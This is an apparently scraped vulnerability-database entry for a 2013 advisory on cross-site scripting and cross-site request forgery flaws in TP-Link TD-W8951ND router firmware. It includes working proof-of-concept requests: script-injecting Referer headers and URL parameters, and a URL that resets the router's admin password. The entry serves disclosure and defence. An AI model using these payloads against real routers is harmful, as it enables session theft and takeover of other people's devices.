VAR-201308-0460
Vulnerability from variot - Updated: 2022-05-17 01:43The TP-LINK TD-W8951ND Router is a wireless router device. TP-LINK TD-W8951ND Router Firmware 4.0.0 Build 120607 Release 30923 has multiple cross-site scripting and cross-site request forgery vulnerabilities. Allows an attacker to exploit a vulnerability to obtain sensitive information or hijack a user's session: 1. Incorrect handling of the Referer field without a URL, allowing unauthenticated attackers to exploit the vulnerability for a reflective cross-site scripting vulnerability. 2. The \"home_wlan_1\" parameter is incorrectly handled, allowing authenticated attackers to exploit vulnerabilities for reflective cross-site scripting vulnerabilities. 3. There are multiple cross-site request forgery attacks, allowing the attacker to construct a malicious URI, enticing the login user to resolve, and performing malicious operations in the target user context, such as resetting the administrator password. Attackers can use these vulnerabilities to execute arbitrary script code in the context of the affected site. They can steal cookie-based authentication, perform unauthorized operations, leak or modify sensitive information, and there may be other forms of attacks. There are vulnerabilities in TP-Link TD-W8951ND 4.0.0 Build 120607.Rel. 30923, other versions may also be affected. Other attacks may also be possible. ----------- Author:
xistence < xistence[at]0x90[.]nl >
Affected products:
Tested on TP-Link TD-W8951ND Firmware 4.0.0 Build 120607 Rel.30923
Affected vendors:
TP-Link http://www.tp-link.com/
Details:
[ 0x01 - Unauthenticated Reflected XSS in Referer for non-existing url pages ]
GET /doesnotexist HTTP/1.1 Host: Referer: http://pwned">alert("XSS") Connection: keep-alive
[ 0x02 - Authenticated Reflected XSS in "home_wlan_1" arguments ]
http:// /Forms/home_wlan_1?wlanWEBFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E http:// /Forms/home_wlan_1?AccessFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E http:// /Forms/home_wlan_1?wlan_APenable=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
[ 0x03 - Authenticated XSS in diagnostics (ping) "/Forms/tools_test_1" argument "PingIPAddr" ]
POST /Forms/tools_test_1 HTTP/1.1 Host: Referer: http:///maintenance/tools_test.htm Authorization: Basic blablabla== Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 164
Test_PVC=PVC0&PingIPAddr=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&pingflag=1&trace_open_flag=0&InfoDisplay=Ping+request+could+not+find+host+
[ 0x04 - Reset Admin password CSRF ]
http:// /Forms/tools_admin_1?uiViewTools_Password=PWNED&uiViewTools_PasswordConfirm=PWNED
Timeline:
2013-05-30 Provided details to TP-Link. 2013-06-01 Response from TP-Link that they will try to fix it. 2013-07-31 No further response, mailed again to ask for status. 2013-08-30 No response, public disclosure
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201308-0460",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "td-w8951nd router",
"scope": null,
"trust": 0.6,
"vendor": "tp link",
"version": null
},
{
"model": "td-w8951nd build 120607.r",
"scope": "eq",
"trust": 0.3,
"vendor": "tp link",
"version": "4.0.0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12811"
},
{
"db": "BID",
"id": "62103"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xistence",
"sources": [
{
"db": "BID",
"id": "62103"
},
{
"db": "PACKETSTORM",
"id": "123016"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-547"
}
],
"trust": 1.0
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2013-12811",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2013-12811",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12811"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The TP-LINK TD-W8951ND Router is a wireless router device. TP-LINK TD-W8951ND Router Firmware 4.0.0 Build 120607 Release 30923 has multiple cross-site scripting and cross-site request forgery vulnerabilities. Allows an attacker to exploit a vulnerability to obtain sensitive information or hijack a user\u0027s session: 1. Incorrect handling of the Referer field without a URL, allowing unauthenticated attackers to exploit the vulnerability for a reflective cross-site scripting vulnerability. 2. The \\\"home_wlan_1\\\" parameter is incorrectly handled, allowing authenticated attackers to exploit vulnerabilities for reflective cross-site scripting vulnerabilities. 3. There are multiple cross-site request forgery attacks, allowing the attacker to construct a malicious URI, enticing the login user to resolve, and performing malicious operations in the target user context, such as resetting the administrator password. Attackers can use these vulnerabilities to execute arbitrary script code in the context of the affected site. They can steal cookie-based authentication, perform unauthorized operations, leak or modify sensitive information, and there may be other forms of attacks. There are vulnerabilities in TP-Link TD-W8951ND 4.0.0 Build 120607.Rel. 30923, other versions may also be affected. Other attacks may also be possible. -----------\nAuthor:\n-----------\n\nxistence \u003c xistence[at]0x90[.]nl \u003e\n\n-------------------------\nAffected products:\n-------------------------\n\nTested on TP-Link TD-W8951ND Firmware 4.0.0 Build 120607 Rel.30923\n\n-------------------------\nAffected vendors:\n-------------------------\n\nTP-Link\nhttp://www.tp-link.com/\n\n----------\nDetails:\n----------\n\n[ 0x01 - Unauthenticated Reflected XSS in Referer for non-existing url\npages ]\n\nGET /doesnotexist HTTP/1.1\nHost: \u003cIP\u003e\nReferer: http://pwned\"\u003e\u003cscript\u003ealert(\"XSS\")\u003c/script\u003e\nConnection: keep-alive\n\n\n[ 0x02 - Authenticated Reflected XSS in \"home_wlan_1\" arguments ]\n\nhttp://\n\u003cIP\u003e/Forms/home_wlan_1?wlanWEBFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E\nhttp://\n\u003cIP\u003e/Forms/home_wlan_1?AccessFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E\nhttp://\n\u003cIP\u003e/Forms/home_wlan_1?wlan_APenable=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E\n\n\n[ 0x03 - Authenticated XSS in diagnostics (ping) \"/Forms/tools_test_1\"\nargument \"PingIPAddr\" ]\n\nPOST /Forms/tools_test_1 HTTP/1.1\nHost: \u003cIP\u003e\nReferer: http://\u003cIP\u003e/maintenance/tools_test.htm\nAuthorization: Basic blablabla==\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 164\n\nTest_PVC=PVC0\u0026PingIPAddr=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E\u0026pingflag=1\u0026trace_open_flag=0\u0026InfoDisplay=Ping+request+could+not+find+host+\n\n\n[ 0x04 - Reset Admin password CSRF ]\n\nhttp://\n\u003cIP\u003e/Forms/tools_admin_1?uiViewTools_Password=PWNED\u0026uiViewTools_PasswordConfirm=PWNED\n\n--------------\nTimeline:\n--------------\n\n2013-05-30 Provided details to TP-Link. \n2013-06-01 Response from TP-Link that they will try to fix it. \n2013-07-31 No further response, mailed again to ask for status. \n2013-08-30 No response, public disclosure",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12811"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-547"
},
{
"db": "BID",
"id": "62103"
},
{
"db": "PACKETSTORM",
"id": "123016"
}
],
"trust": 1.44
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "62103",
"trust": 1.5
},
{
"db": "PACKETSTORM",
"id": "123016",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2013-12811",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201308-547",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12811"
},
{
"db": "BID",
"id": "62103"
},
{
"db": "PACKETSTORM",
"id": "123016"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-547"
}
]
},
"id": "VAR-201308-0460",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12811"
}
],
"trust": 1.475
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12811"
}
]
},
"last_update_date": "2022-05-17T01:43:24.463000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://packetstormsecurity.com/files/123016/tplinktdw8951nd-xssxsrf.txt"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/62103"
},
{
"trust": 0.3,
"url": "http://www.tp-link.us/support/download/?pcid=203\u0026model=td-w8951nd"
},
{
"trust": 0.1,
"url": "http://pwned\"\u003e\u003cscript\u003ealert(\"xss\")\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "http://www.tp-link.com/"
},
{
"trust": 0.1,
"url": "http://\u003cip\u003e/maintenance/tools_test.htm"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12811"
},
{
"db": "BID",
"id": "62103"
},
{
"db": "PACKETSTORM",
"id": "123016"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-547"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-12811"
},
{
"db": "BID",
"id": "62103"
},
{
"db": "PACKETSTORM",
"id": "123016"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-547"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-12811"
},
{
"date": "2013-08-30T00:00:00",
"db": "BID",
"id": "62103"
},
{
"date": "2013-08-30T18:22:22",
"db": "PACKETSTORM",
"id": "123016"
},
{
"date": "2013-08-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201308-547"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-12811"
},
{
"date": "2013-08-30T00:00:00",
"db": "BID",
"id": "62103"
},
{
"date": "2013-09-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201308-547"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201308-547"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "TP-LINK TD-W8951ND Router has multiple input validation vulnerabilities",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12811"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201308-547"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…